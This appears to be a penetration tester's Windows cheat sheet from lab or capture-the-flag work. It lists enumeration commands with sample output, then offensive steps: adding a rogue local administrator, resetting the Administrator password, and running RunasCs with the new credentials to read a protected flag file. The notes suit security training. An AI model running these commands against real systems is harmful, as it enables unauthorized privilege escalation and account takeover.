Basic Windows Commands

LOL Bins

Basic enum commands

Enumeration from Windows Host

Command	Result
hostname	Prints the PC's Name
[System.Environment]::OSVersion.Version	Prints out the OS version and revision level
wmic qfe get Caption,Description,HotFixID,InstalledOn	Prints the patches and hotfixes applied to the host
ipconfig /all	Prints out network adapter state and configurations
set	Displays a list of environment variables for the current session (ran from CMD-prompt)
echo %USERDOMAIN%	Displays the domain name to which the host belongs (ran from CMD-prompt)
echo %logonserver%	Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

List Local Admins

cmd

net localgroup Administrators

powershell

PS C:\Windows\system32> Get-LocalGroupMember -Group "Administrators"

Privileges

1. net localgroup

Once connected, we can check to see what privileges bwilliamson has. We can start with looking at the local group membership using the command:

*Evil-WinRM* PS C:\> net localgroup

Aliases for \\DC01

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.

1. net user username - Checking User Account Privileges including Domain

*Evil-WinRM* PS C:\> net user bwilliamson

User name                    bwilliamson
Full Name                    Ben Williamson
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/13/2022 12:48:58 PM
Password expires             Never
Password changeable          1/14/2022 12:48:58 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/14/2022 2:07:49 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Domain Admins
The command completed successfully.

1. whoami /priv

Windows

Add user to admin local group

net user <username> <password> /add
net localgroup administrators <username> /add

net user mark Password123 /add && net localgroup administrators mark /add

Use a "complex" password - If not, the user will not be created

PS C:\xampp\htdocs\dev> net user 0xss0rz 0xss0rz /add # The User is not created
PS C:\xampp\htdocs\dev> net user user password /add # The User is not created :(

PS C:\xampp\htdocs\dev> net user 0xss0rz password123! /add
The command completed successfully.                    # The User is created !!!!!

PS C:\xampp\htdocs\dev> net user 0xss0rz
User name                    0xss0rz
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/26/2025 10:07:36 AM
Password expires             3/9/2025 10:07:36 AM
Password changeable          1/27/2025 10:07:36 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

PS C:\xampp\htdocs\dev> net localgroup administrators 0xss0rz /add
The command completed successfully.
PS C:\xampp\htdocs\dev> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
0xss0rz
Administrator
Domain Admins
TRUSTED\Enterprise Admins
The command completed successfully.

RunAsC

RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credentials

GitHub - antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exeGitHub

.\RunasCs.exe administrator password123! "cmd.exe /c type c:\Users\Administrator\Desktop\root.txt"

Read encrypted file

Find encrypted files

c:\Users\Administrator\Desktop>cipher /u /n

Encrypted File(s) on your system:

C:\Users\Administrator\Desktop\root.txt

If you don't know the user password, change it. You have to know the user plaintext password to decipher and read the file in the user context

Evil-WinRM* PS C:\Users\Administrator\Desktop> net user administrator "password123!"
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\RunasCs.exe administrator password123! "cmd.exe /c type c:\Users\Administrator\Desktop\root.txt"

Mount SMB share

SMB (445, 139) / RPC